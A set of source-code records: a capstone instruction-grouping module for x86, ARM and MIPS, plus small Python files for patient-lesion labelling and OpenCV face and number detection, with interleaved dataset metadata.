] X86_GRP_FLOAT_CMP = [ # floating point compare instructions "FCOM", "FCOMP", "FCOMPP", "FUCOM", "FUCOMP", "FUCOMPP", "FICOM", "FICOMP", "FCOMI", "FUCOMI", "FCOMIP", "FUCOMIP", "FTST", "FXAM", # SSE "CMPPS", "CMPEQPS", "CMPNEQPS", "CMPLTPS", "CMPNLTPS", "CMPSS", "CMPEQSS", "CMPNEQSS", "CMPLTSS", "CMPNLTSS", "COMISS", "UCOMISS", "CMPPD", "CMPEQPD", "CMPNEQPD", "CMPLTPD", "CMPNLTPD", "CMPSD", "CMPEQSD", "CMPNEQSD", "CMPLTSD", "CMPNLTSD", "COMISD", "UCOMISD", # vector "VPCMP", ] X86_GRP_FLOAT_ARITH = [ # - floating point instructions: "FADD", "FADDP", "FIADD", "FSUB", "FSUBP", "FISUB", "FSUBR", "FSUBRP", "FISUBR", "FMUL", "FMULP", "FIMUL", "FDIV", "FDIVP", "FIDIV", "FDIVR", "FDIVRP", "FIDIVR", "FPREM", "FPREM1", "FABS", "FCHS", "FRNDINT", "FSCALE", "FSQRT", "FXTRACT", # floating point transcendental instructions "FSIN", "FCOS", "FSINCOS", "FPTAN", "FPATAN", "F2XM1", "FYL2X", "FYL2XP1", # fpu register related "FINCSTP", "FDECSTP", # SSE "ADDPS", "ADDSS", "SUBPS", "SUBSS", "MULPS", "MULSS", "DIVPS", "DIVSS", "RCPPS", "RCPSS", "SQRTPS", "SQRTSS", "RSQRTPS", "RSQRTSS", "MAXPS", "MAXSS", "MINPS", "MINSS", # SSE2 "ADDSD", "SUBSD", "MULSD", "DIVSD", "RCPSD", "SQRTSD", "RSQRTSD", "MAXSD", "MINSD", # SSE3 "ADDSUBPS", "ADDSUBPD", "HADDPS", "HSUBPS", "HADDPD", "HSUBPD", # SSE4 "DPPD", "DPPS", # vector "VPMAX", "VPMIN", "VRCP", "VRNDSCAL", "VRSQRT", "VSCALE", "ADDPD", "ADDSD", "MULPD", "MULSD", "SUBPD", "SUBSD", "DIVPD", "DIVSD", "RCPPD", "RCPSD", ] X86_GRP_CMP = [ "CMP", "COMI", "CLT", # from dtransfer "CMPXCHG", "CMPXCHG8B", # from bit "TEST", # from string "CMPS", "CMPSB", "CMPSD", "CMPSW", # MMX "PCMPEQB", "PCMPEQW", "PCMPEQD", "PCMPGTB", "PCMPGTW", "PCMPGTD", # SSE4 "PHMINPOSUW", "PTEST", "PCMPEQQ", # SSE4.2 "PCMPESTRI", "PCMPESTRM", "PCMPISTRI", "PCMPISTRM", "PCMPGTQ", # Vector "VPTEST", ] # Shift and Rotate Instructions: X86_GRP_SHIFT = [ # general purpose instructions "SAR", "SHR", "SAL", "SHL", "SHRD", "SHLD", "ROR", "ROL", "RCR", "RCL", # BMI1, BMI2 "RORX", "SARX", "SHLX", "SHRX", # MMX "PSLLW", "PSLLD", "PSLLQ", "PSRLW", "PSRLD", "PSRLQ", "PSRAW", "PSRAD", # SSE2 128-bit integer "PSLLDQ", "PSRLDQ", # vector "VPROL", "VPROR", "VPSRA", "VPSLL", "VPSRA", ] # Logical Instructions: X86_GRP_LOGIC = [ # general purpose instructions "AND", "NOT", "OR", "XOR", # BMI1, BMI2 "ANDN", # MMX "PAND", "PANDN", "POR", "PXOR", # SSE "ANDPS", "ANDNPS", "ORPS", "XORPS", # SSE2 "ANDPD", "ANDNPD", "ORPD", "XORPD", # Vector "VPTERLOG", ] # bit and byte instructions: X86_GRP_BIT = [ # general purpose instructions "SETA", "SETAE", "SETB", "SETBE", "SETC", "SETE", "SETG", "SETGE", "SETL", "SETLE", "SETNA", "SETNAE", "SETNB", "SETNBE", "SETNC", "SETNE", "SETNG", "SETNGE", "SETNL", "SETNLE", "SETNO", "SETNP", "SETNS", "SETNZ", "SETO", "SETP", "SETPE", "SETPO", "SETS", "SETZ", "TEST", "CRC32", # BMI1, BMI2 "BLSMSK", "BLSR", "CLAC", "STAC", # from bit "TEST", "BT", "BTS", "BTR", "BTC", "BSF", "BSR", "POPCNT", "TZCNT", "LZCNT", ] # control transfer instructions: X86_GRP_CTRANSFER = [ # general purpose instructions "JMP", "CALL", "RET", "IRET", "INT", "INTO", "BOUND", "ENTER", "LEAVE", # flag "CLI", "STI", # SSE2 "PAUSE", # SSE3 "MONITOR", "MWAIT", "XABORT", "XACQUIRE", "XRELEASE", "XBEGIN", "XEND", "XTEST", "HLT", "SYSCALL", "SYSENTER", "SYSEXIT", "SYSRET", "FWAIT", "WAIT", # vm related instructions "VMCALL", "VMLAUNCH", "VMMCALL", "VMRESUME", "VMRUN", "VMFUNC", "VMCLEAR", "VMXON", "VMXOFF", ] X86_GRP_COND_CTRANSFER = [ # general purpose instructions "JA", "JAE", "JB", "JBE", "JC", "JCXZ", "JE", "JECXZ", "JRCXZ", "JG", "JGE", "JL", "JLE", "JNAE", "JNB", "JNBE", "JNC", "JNE", "JNG", "JNGE", "JNL", "JNLE", "JNO", "JNP", "JNS", "JNZ", "JO", "JP", "JPE", "JPO", "JS", "JZ", "LOOP", "LOOPE", "LOOPNE", "LOOPNZ", "LOOPZ", # string "REP", "REP MOVSQ", "REP STOSQ", "REPNE", "REPNZ", "REPE", "REPZ", ] # ==================== ARM 32 ============================================= ARM_GRP_DTRANSFER = [ # general purpose instructions "LDA", "ADR", "ADRP", "LDR", "LDRD", "LDRB", "LDRBT", "LDRH", "LDRS", "LDRSB", "LDRSBT", "LDRSH", "LDRSHT", "LDRT", "LDRHT", "STR", "STRB", "STRD", "STRH", "STRBT", "STRT", "LDM", "LDMDA", "LDMDB", "LDMIB", "STM", "STMDA", "STMDB", "STMIB", "PLD", "SWP", "MOV", "MOVI", "MOVK", "MOVZ", "MOVT", "MOVN", "MVN", "MVNI", "STP", "LDP", "RFEIB", # coprocessor data operations "CDP", "MCR", "MCRR", "MRC", "MRR", "LDC", "LDCL", "STC", "STCL", "PUSH", "SBFX", "SBFIZ", "BFX", "BFXIL", "UBFX", "UBFIZ", "VLD", "VST", "VST2", "VSTMDB", "VTBL", "VTBX", "ZIP", "ZIP1", "ZIP2", "UZP", "UZP1", "UZP2", "XTN", "XTN2", "CSEL", "LD1", "LD2", "LD4", "ST1", "ST2", "ST4", "LDPSW", "LDRSW", "SXTAB", "SXTB", "SXTH", "SXTW", "EXT", "EXTR", "INS", "UXTAB", "UXTB", "UXTH", "UXTW", "BFC", "BFI", "BIC", "CLZ", "REV", "REV16", "REV32", "REV64", "CSET", ] ARM_GRP_FLOAT_DTRANSFER = [ # floating point data transfer instructions "FCPY", "FCVTMS", "FCVTMU", "FCVTZS", "FCVTZU", "FCVT", "FLD", "FST", "FMR", "FMD", "FMS", "FMX", "FSITO", "FUITO", "FTOSI", "FTOUI", "FMOV", "UMOV", "LDUR", "LDURB", "LDURH", "LDURSB", "LDURSH", "LDURSW", "STUR", "STURB", "STURH", "STURSB", "STURSH", "STURSW", "DUP", "SCVTF", "UCVTF", ] ARM_GRP_MISC = [ "UDF", "NOP", "MRS", "MSR", "MAR", "MRA", "VMRS", "VMSR", "DBG", "DMB", "DSB", "ISB", "SETEND", ] # binary arithmetic instructions: ARM_GRP_ARITH = [ # general purpose instructions "ADD", "ADDW", "ADDP", "ADDV", "ADC", "SUB", "SBC", "RSB", "RSC", "CMN", "CLZ", "MUL", "MLA", "MLS", "CINC", "CINV", "NEG", "NEGS", "DIV", "SMAX", "SMAXV", "SMIN", "SMINV", "UMULL", "UMLAL", "UMLAL2", "SMLA", "SMLAL", "SMLALTT", "SMUL", "SMSUB", "MADD", "MNEG", "MSUB", "SMADDL", "SMNEGL", "SMSUBL", "SMULH", "SMULL", "UMADDL", "UMNEGL", "UMSUBL", "UMULH", "UMULL", "SDIV", "UDIV", "MIA", "QADD", "QSUB", "QDADD", "QDSUB", "QASX", "SADD", "SADDW", "SADDW2", "SASX", "SHADD", "SHASX", "SMLSD", "SMMLA", "SMUAD", "SMUSD", "SSUB", "SAT", "SAX", "UADD", "UADDW", "UADDW2", "USAT", "USAX", "UASX", "UHADD", "UHASX", "UMLSD", "UMMLA", "UQADD", "UQSAX", "UQSUB", "UHSAX", "VABA", "VABD", "MAX", "MIN", "VMLA", "VMLS", "VNMUL", "VNMLA", "VNMLS", "VFMS", "VFMS", "VFMA", "VFMS", "VFNMA", "VFNMS", "VRECPE", "VSQRT", "VQRSH", "UMULL", "UMAAL", "UMLAL", "USADA8", "VNEG", "CNEG", "CSINC", "CSINV", "CSNEG", ] ARM_GRP_FLOAT_ARITH = [ # floating point arithmetic instructions "FABS", "FABD", "FADD", "FSUB", "FDIV", "FMUL", "FNMUL", "FSQRT", "FMAC", "FNMAC", "FMSC", "FNMSC", "FNEG", "FMADD", "FMSUB", "FNMADD", "FNMSUB", "FPINT", "FCSEL", "FMAX", "FMIN", "FMLA", "FMLS", "FRINTM", "FRINTP", "FRINT", ] ARM_GRP_SHIFT = [ # shift operations "ASR", "LSL", "LSR", "ROR", "RRX", "PKHBT", "PKHTB", "SHL", "USHL", "USHLL", "USHLL2", "USHR", "USRA", "SSHL", "SSHLL", "SSHLL2", "SSHR", ] ARM_GRP_CMP = [ # compare instructions "CMEQ", "CMGT", "CMHI", "CMHS", "CMP", "CCMN", "CCMP", "VCEQ", "VCGE", "VCGT", "VCLE", "VCLT", # from bit "TST", "TEQ", ] ARM_GRP_FLOAT_CMP = [ "VCMP", "VCMPE", "FCMPE", "FCMGT", "FCM", "FCMP", "FCCMP", "VCM", ] # Logical Instructions: ARM_GRP_LOGIC = [ "AND", "ORR", "EOR", "EON", "ORN", ] # bit and byte instructions: ARM_GRP_BIT = [ "TST", "TEQ", "BSL", "BIF", "BIT", "BFC", "BFI", "BIC", "CLZ", "RBIT", "REV", "REV16", "REV32", "REV64", "CSET", ] # control transfer instructions: ARM_GRP_CTRANSFER = [ "B", "BR", "BL", "BLR", "BX", "BLX", "BXJ", "BAL", "BLAL", "BXAL", "BLXAL", "BXJAL", "SWI", "BKPT", "RET", "YIELD", "WFE", "WFI", "SEV", "SEVL", "CPS", "BRK", "HLT", "SVC", "HVC", "SMC", "TRAP", "ERET", # ARM POP is return "POP", ] ARM_GRP_COND_CTRANSFER = [ "BEQ", "BNE", "BCS", "BCC", "BMI", "BPL", "BVS", "BVC", "BHI", "BLS", "BGE", "BLT", "BGT", "BLE", "BLEQ", "BLNE", "BLCS", "BLCC", "BLMI", "BLPL", "BLVS", "BLVC", "BLHI", "BLLS", "BLGE", "BLLT", "BLGT", "BLLE", "BXEQ", "BXNE", "BXCS", "BXCC", "BXMI", "BXPL", "BXVS", "BXVC", "BXHI", "BXLS", "BXGE", "BXLT", "BXGT", "BXLE", "BLXEQ", "BLXNE", "BLXCS", "BLXCC", "BLXMI", "BLXPL", "BLXVS", "BLXVC", "BLXHI", "BLXLS", "BLXGE", "BLXLT", "BLXGT", "BLXLE", "BXJEQ", "BXJNE", "BXJCS", "BXJCC", "BXJMI", "BXJPL", "BXJVS", "BXJVC", "BXJHI", "BXJLS", "BXJGE", "BXJLT", "BXJGT", "BXJLE", "TBZ", "TBNZ", # combined instructions "CBZ", "CBNZ", ] # ==================== MIPS 32 ============================================= # data transfer # refernce : https://www.cs.cornell.edu/courses/cs3410/2008fa/MIPS_Vol2.pdf MIPS_GRP_DTRANSFER = [ "LB", "LBU", "LH", "LHU", "LL", "LW", "LWU", "LD", "LDL", "LDR", "LWL", "LWR", "PREF", "SB", "SC", "SD", "SDL", "SDR", "SH", "ST", "SW", "SWL", "SWR", "SYNC", "LUI", "LDXC1", "LWXC1", "SDXC1", "SWXC1", "MFHI", "MFLO", "MOV", "MOVF", "MOVN", "MOVT", "MOVZ", "MTHI", "MTLO", "MOVE", "CVT", "LDC", "LWC", "SDC", "SWC", # move "CFC", "CTC", "MFC", "MTC", "PREF", "SYNC", "SPLAT", "CFCMSA", "CTCMSA", "COPY", "PUSH", "SEH", "SEB", "WSBH", "DSBH", "DSHD", "MTC0", "MFC0", "LDC3", "LWC3", "SDC3", "SWC3", # coprocessor load, store "COP2", "LDC2", "LWC2", "SDC2", "SWC2", # cop move "CFC2", "CTC2", "MFC2", "MTC2", ] MIPS_GRP_FLOAT_DTRANSFER = [ # floating point "FRINT", "FCLASS", # load, store, memory "LDC1", "LWC1", "SDC1", "SWC1", # move "CFC1", "CTC1", "MFC1", "FMOV", "MOVF", "MOVN", "MOVT", "MOVZ", "MTC1", # convert "FEX", "FFINT", "FFQ", "FTINT", "FTRUN", "FTQ", "FCVT", "FLOOR", "ROUND", "TRUNC", "FFLOOR", "FROUND", "FTRUNC", "DMFC", "DMFC1", "DMTC", "DMTC1", "MTHC1", "MFHC1", ] # binary arithmetic instructions: MIPS_GRP_ARITH = [ # general purpose instructions "ADD", "ADDI", "ADDU", "ADDIU", "SUB", "SUBU", "MUL", "MULT", "MULTU", "CLO", "CLZ", "DIV", "DIVU", "MADD", "MADDU", "MSUB", "MSUBU", "AADD", "ASUB", "ABS", "NEG", "NEGU", # additional "DAA", "DSUB", "DSUBU", "DSUBIU", "DDIV", "DDIVU", "DDIVIU", "DMUL", "DMULT", "DMULTU", "DOTP", "DPADD", "DPSUB", "MADD", "MAX", "MIN", "MSUB", "MOD", "SAT", "HSUB", "SQRT", "AUI", "DAUI", "DAHI", "DATI", "ADDIUPC", "AUIPC", "ALUIPC", "DADD", "DADDU", "DADDIU", "DCLZ", # from bit "BMZ", "BMN", "BNEG", ] MIPS_GRP_CMP = [ "SLT", "SLTI", "SLTIU", "SLTU", # compare instructions "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT", "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT", "CNGE", "CLE", "CNGT", "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT", "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT", "CNGE", "CLE", "CNGT", "C", ] MIPS_GRP_FLOAT_CMP = [ # floating point compare instructions "FACF", "FC", "FS", ] MIPS_GRP_SHIFT = [ # shift operation "SLL", "SLLV", "SRL", "SRLV", "SRA", "SRAV", "SHL", "SHR", "SLD", "DSLL", "DSLL32", "DSLLV", "DSRA", "DSRA32", "DSRAV", "DSRL", "DSRL32", "DSRLV", "ROTR", "ROTRV", "DROTR", "DROTR32", "DROTRV", "LSA", "DLSA", ] MIPS_GRP_FLOAT_ARITH = [ # floating point "FABS", "FADD", "FDIV", "FMADD", "FMSUB", "FMUL", "FNEG", "FNMADD", "FNMSUB", "FEXP", "FLOG", "FMAX", "FMIN", "FRCP", "RECIP", "FRECIP", "FRSQRT", "FSQRT", "FSUB", ] # Logical Instructions: MIPS_GRP_LOGIC = [ "AND", "ANDI", "NOR", "OR", "NOT", "ORI", "XOR", "XORI", ] # bit and byte instructions: MIPS_GRP_BIT = [ "BINS", "DINS", "DEXT", "EXT", "INS", "BMZ", "BMN", "BNEG", "BSEL", "BSET", "BCLR", # bit wise count "NLOC", "NLZC", "PCNT", ] MIPS_GRP_MISC = [ "NOP", "SSNOP", "CACHE", "TLBP", "TLBR", "TLBWI", "TLBWR", ] # control transfer instructions: MIPS_GRP_CTRANSFER = [ "B", "BAL", "J", "JAL", "JR", "JALR", "BREAK", "SYSCALL", "PAUSE", "WAIT", "HLT", "ERET", "DERET", "SDBBP", "BKPT", "RET", "MFC0", "MTC0", # MIPS POP is return "POP", # float "BC1", "BC1F", "BC1T", "BC1FL", "BC1TL", # cop "BC2F", "BC2T", "BC2FL", "BC2TL", "BC3F", "BC3T", "BC3FL", "BC3TL", ] MIPS_GRP_COND_CTRANSFER = [ "BEQ", "BEQZ", "BNE", "BGE", "BGEZ", "BGEZAL", "BGTZ", "BLEZ", "BLTZ", "BLTZAL", "BNEL", "BNEZ", "BNZ", "TEQ", "TEQI", "TGE", "TGEI", "TGEIU", "TGEU", "TLT", "TLTI", "TLTIU", "TLTU", "TNE", "TNEI", "BEQL", "BGEZALL", "BGEZL", "BGTZL", "BLEZL", "BLTZALL", "BLTZL", "BNEL", ] # ============================================ # Below part creates dictionary which groups instructions X86_GRP_MAP = { 9: X86_GRP_FLOAT_DTRANSFER + X86_GRP_FLOAT_CMP + X86_GRP_FLOAT_ARITH, 10: X86_GRP_MISC + X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER, 11: X86_GRP_FLOAT_ARITH + X86_GRP_SHIFT + X86_GRP_ARITH, 12: X86_GRP_LOGIC, 13: X86_GRP_COND_CTRANSFER + X86_GRP_CTRANSFER, 20: X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER, 21: X86_GRP_FLOAT_ARITH + X86_GRP_ARITH, 22: X86_GRP_FLOAT_CMP + X86_GRP_CMP, 23: X86_GRP_SHIFT, 24: X86_GRP_BIT, 26: X86_GRP_COND_CTRANSFER, 27: X86_GRP_CTRANSFER, 28: X86_GRP_MISC, 30: [], } ARM_GRP_MAP = { 9: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_FLOAT_CMP + ARM_GRP_FLOAT_ARITH, 10: ARM_GRP_MISC + ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER, 11: ARM_GRP_FLOAT_ARITH + ARM_GRP_SHIFT + ARM_GRP_ARITH, 12: ARM_GRP_LOGIC, 13: ARM_GRP_COND_CTRANSFER + ARM_GRP_CTRANSFER, 20: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER, 21: ARM_GRP_FLOAT_ARITH + ARM_GRP_ARITH, 22: ARM_GRP_FLOAT_CMP + ARM_GRP_CMP, 23: ARM_GRP_SHIFT, 24: ARM_GRP_BIT, 26: ARM_GRP_COND_CTRANSFER, 27: ARM_GRP_CTRANSFER, 28: ARM_GRP_MISC, 30: [], } # A64 does not allow instructions to be conditionally executed as ARM. def _copy_for_arm64(): import copy return copy.deepcopy(ARM_GRP_MAP) ARM64_GRP_MAP = _copy_for_arm64() # ARM instructions may have conditional suffix. Thus, initialize here. However, # reference : http://infocenter.arm.com/help/index.jsp ARM_COND_GROUPS = [9, 10, 11, 13, 20, 21, 22, 26] ARM_GRP_COND_CODE = [ "EQ", "NE", "CS", "HS", "CC", "LO", "MI", "PL", "VS", "VC", "HI", "LS", "GE", "LT", "GT", "LE", "AL", ] # for group_no in ARM_COND_GROUPS: # for inst in ARM_GRP_MAP[group_no]: # for cond in ARM_GRP_COND_CODE: # ARM_GRP_MAP[group_no].append(inst + cond) MIPS_GRP_MAP = { 9: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_FLOAT_CMP + MIPS_GRP_FLOAT_ARITH, 10: MIPS_GRP_MISC + MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER, 11: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_SHIFT + MIPS_GRP_ARITH, 12: MIPS_GRP_LOGIC, 13: MIPS_GRP_COND_CTRANSFER + MIPS_GRP_CTRANSFER, 20: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER, 21: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_ARITH, # mips usually contains compare in conditional branch 22: MIPS_GRP_FLOAT_CMP + MIPS_GRP_CMP + MIPS_GRP_COND_CTRANSFER, 23: MIPS_GRP_SHIFT, 24: MIPS_GRP_BIT, 26: MIPS_GRP_COND_CTRANSFER, 27: MIPS_GRP_CTRANSFER, 28: MIPS_GRP_MISC, 30: [], } # ============================================ GRP_NO_MAP = { # Among capstone's default mapping, use 1, 2, 3 as they are common in all # architectures. 1: "grp_jump", 2: "grp_call", 3: "grp_ret", 9: "floatinst", 10: "abs_dtransfer", 11: "abs_arith", 12: "logic", 13: "abs_ctransfer", 20: "dtransfer", 21: "arith", 22: "cmp", 23: "shift", 24: "bitflag", 26: "cndctransfer", 27: "ctransfer", 28: "misc", 30: "unknown", } GRP_NAME_MAP = {val: key for key, val in GRP_NO_MAP.items()} # ============================================ # Below part maps capstone's internal instruction numbers to pre-defined groups def _check_inst(target_inst, check_list, suffixes=[]): target_inst = target_inst.split("_")[0] target_inst = target_inst.split(".")[0] target_inst = target_inst.upper() for inst in check_list: if target_inst == inst: return True # Check conditional code if target_inst.startswith(inst): if len(target_inst) - len(inst) == 2: for suffix in suffixes: if target_inst == inst + suffix: return True return False def _init_inst_groups(prefix, target, groups): insts = list(filter(lambda x: x.startswith(prefix), dir(target))) inst_map = {} if prefix == "ARM_INS_": suffixes = ARM_GRP_COND_CODE else: suffixes = [] for inst in insts: inst_no = getattr(target, inst) inst = inst.replace(prefix, "") inst_map[inst_no] = [] for group_no, grouped_insts in groups.items(): if _check_inst(inst, grouped_insts, suffixes): inst_map[inst_no].append(group_no) if not inst_map[inst_no]: inst_map[inst_no].append(GRP_NAME_MAP["unknown"]) return inst_map def _init_groups(): import capstone x86 = _init_inst_groups("X86_INS_", capstone.x86, X86_GRP_MAP) arm = _init_inst_groups("ARM_INS_", capstone.arm, ARM_GRP_MAP) arm64 = _init_inst_groups("ARM64_INS_", capstone.arm64, ARM64_GRP_MAP) mips = _init_inst_groups("MIPS_INS_", capstone.mips, MIPS_GRP_MAP) ppc = _init_inst_groups("PPC_INS_", capstone.ppc, PPC_GRP_MAP) return x86, arm, arm64, mips, ppc X86_INST_MAP, ARM_INST_MAP, ARM64_INST_MAP, MIPS_INST_MAP, PPC_INST_MAP = _init_groups()
14.753525
88
0.455952
2,666
28,253
4.683421
0.587772
0.020663
0.016338
0.006407
0.106279
0.077607
0.045971
0.016979
0.016979
0.016979
0
0.024486
0.343751
28,253
1,914
89
14.761233
0.64894
0.108201
0
0.174723
0
0
0.297529
0
0
0
0
0
0
1
0.00233
false
0
0.001747
0
0.007571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd65fd304b42fd5e57669cf829df3d843fd24ed
814
py
Python
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
9
2018-02-02T07:26:06.000Z
2021-07-28T11:27:38.000Z
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
null
null
null
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
4
2017-02-22T03:23:44.000Z
2021-12-10T10:32:08.000Z
"""Routines for handling patient lists.""" # TODO: Some functions from dwi.compat should be replaced with something better # here, they're still used by tools/{roc_auc,correlation}.py. from .types import GleasonScore def label_lesions(patients, thresholds=None): """Label lesions according to score groups.""" # Alternative: np.searchsorted(thresholds, [x.score for x in l]) if thresholds is None: thresholds = GleasonScore.THRESHOLDS_STANDARD thresholds = [GleasonScore(x) for x in thresholds] lesions = (l for p in patients for l in p.lesions) for l in lesions: l.label = sum(l.score > x for x in thresholds) def keep_scan(patients, i): """Discard other scans except index i. NOTE: Changes the structure.""" for p in patients: p.scans = [p.scans[i]]
33.916667
79
0.697789
118
814
4.779661
0.542373
0.021277
0.031915
0.024823
0.060284
0
0
0
0
0
0
0
0.202703
814
23
80
35.391304
0.869029
0.422604
0
0
0
0
0
0
0
0
0
0.043478
0
1
0.181818
false
0
0.090909
0
0.272727
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
bdd6f392de5f9a7829a76f27096203708e20bfc0
79
py
Python
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
1
2017-10-24T08:19:15.000Z
2017-10-24T08:19:15.000Z
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
31
2017-10-31T11:09:44.000Z
2018-12-04T07:47:46.000Z
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
5
2017-10-26T02:13:08.000Z
2018-07-05T04:58:47.000Z
def getUser(): return "Sanghak,Lee / http://sanghaklee.tistory.com" #FIXME:
39.5
64
0.696203
10
79
5.5
1
0
0
0
0
0
0
0
0
0
0
0
0.126582
79
2
64
39.5
0.797101
0.075949
0
0
0
0
0.589041
0
0
0
0
0.5
0
1
0.5
true
0
0
0.5
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
1
0
0
1
1
0
0
7
bdd8443fccc1ae0affec98253387eaf4b0c3a80b
5,039
py
Python
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
import sys import cv2 import os, os.path import ColorClustering import numpy as np from PIL import Image from pytesser import * from sklearn.cluster import KMeans from sklearn.externals import joblib def find_most_Color(im, clusters): imBodyRGB = cv2.cvtColor(im, cv2.COLOR_BGR2RGB) imBodyRGB = imBodyRGB.reshape((imBodyRGB.shape[0] * imBodyRGB.shape[1], 3)) clt = KMeans(n_clusters=clusters) clt.fit(imBodyRGB) hist = ColorClustering.centroid_histogram(clt) bar = ColorClustering.plot_colors(hist, clt.cluster_centers_) return bar for root, _, files in os.walk('image/'): for f in files: imagePath = os.path.join(root, f) if 'tmp' in imagePath: continue cascPath = 'haarcascade_frontalface_default.xml' faceCascade = cv2.CascadeClassifier(cascPath) image = cv2.imread(imagePath) imHeight, imWidth, channels = image.shape cv2.putText(image, '%ix%i' %(imWidth,imHeight), (50, 50),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2) gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) faces = faceCascade.detectMultiScale( gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.cv.CV_HAAR_SCALE_IMAGE ) for facesCount, (fx, fy, fw, fh) in enumerate(faces): faceCom = imWidth/10 if imWidth>imHeight else imHeight/10 if faceCom - fh > 50 or faceCom - fh < -30: continue cv2.rectangle(image, (fx, fy), (fx + fh, fy + fh), (0, 255, 0), 2) cv2.putText(image, 'face: %i' %(facesCount), (fx, fy + fh),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2) cv2.putText(image, 'size: %i:%i' %(fw,fh), (fx, fy + fh -30),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2) cv2.putText(image, 's.comp: %i ' %(faceCom), (fx, fy + fh -60),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2) bodyY = fy+(fh*2) bodyX1 = fx - fw / 3 bodyX1 = 0 if bodyX1 < 0 else bodyX1 imBody = image[fy + (fh*2):fy + (fh * 5), bodyX1:fx + fw + (fw / 3)] cv2.rectangle(image, (bodyX1, fy + (fh*2)), (fx + fw + (fw / 3), fy + (fh * 5)), (0, 255, 255), 2) gray = cv2.cvtColor(imBody, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray, (9, 9), 0) thresh = cv2.adaptiveThreshold(blur, 255, 1, 1, 11, 2) contours, hierarchy = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) dicBody = {} dicTmp = {} dicBest = {} for cntCount, cnt in enumerate(contours): [cx,cy,cw,ch] = cv2.boundingRect(cnt) if cv2.contourArea(cnt) > 28 and (fh / 5) < ch < (fh / 2) and cw < (fw / 2) : cv2.rectangle(imBody, (cx, cy), (cx + cw, cy + ch), (0, 0, 255), 2) poin = np.array([cx,cy,cw,ch]) numBar = find_most_Color(imBody[cy:cy + ch, cx:cx + cw], 2) dicBody[cntCount] = (poin,numBar[0][0],numBar[0][len(numBar[0]) - 1]) for cont in dicBody: x = dicBody[cont][0][0] y = dicBody[cont][0][1] h = dicBody[cont][0][3] c1 = dicBody[cont][1] c2 = dicBody[cont][2] clc1 = c1 if c1[0] > c2[0] else c2 for c2Count, cont2 in enumerate(dicBody): xl = dicBody[cont2][0][0] yl = dicBody[cont2][0][1] hl = dicBody[cont2][0][3] cl1 = dicBody[cont2][1] cl2 = dicBody[cont2][2] clc2 = cl1 if cl1[0] > cl2[0] else cl2 clcl = int(clc1[0]) - int(clc2[0]) if yl - 10 < y < yl + 10 and xl - 200 < x < xl + 200 and hl - 5 < h < hl + 5 and abs(clcl) < 10: dicTmp[c2Count] = dicBody[cont2] if len(dicTmp) > len(dicBest) and len(dicTmp) > 1: dicBest = dicTmp dicTmp = {} minX = 999999 maxX = 0 minY = 999999 maxY = 0 for rec in dicBest: [rx, ry, rw, rh] = dicBest[rec][0] if minX > rx: minX = rx if minY > ry: minY = ry if maxY < ry+rh: maxY = ry+rh if maxX < rx+rw: maxX = rx+rw if minX <999999 and maxX >0: imgNum = imBody[minY:maxY, minX:maxX] cv2.rectangle(imBody, (minX+2, minY+2), (maxX+2, maxY+2), (255, 0, 255), 2) # cv2.imshow(str(facesCount),imBody) # cv2.imshow('num'+str(facesCount),imgNum) cv2.namedWindow("main", cv2.cv.CV_WINDOW_NORMAL) imageWinSize = cv2.resize(image, (imWidth/2, imHeight/2)) while True: cv2.imshow("main", imageWinSize) key = cv2.waitKey(1) & 0xFF if key == ord("w"): break elif key == ord("q"): cv2.destroyAllWindows() sys.exit()
41.991667
118
0.519944
656
5,039
3.946646
0.286585
0.013905
0.011587
0.011587
0.066435
0.053302
0.053302
0.053302
0.053302
0.032445
0
0.076133
0.343124
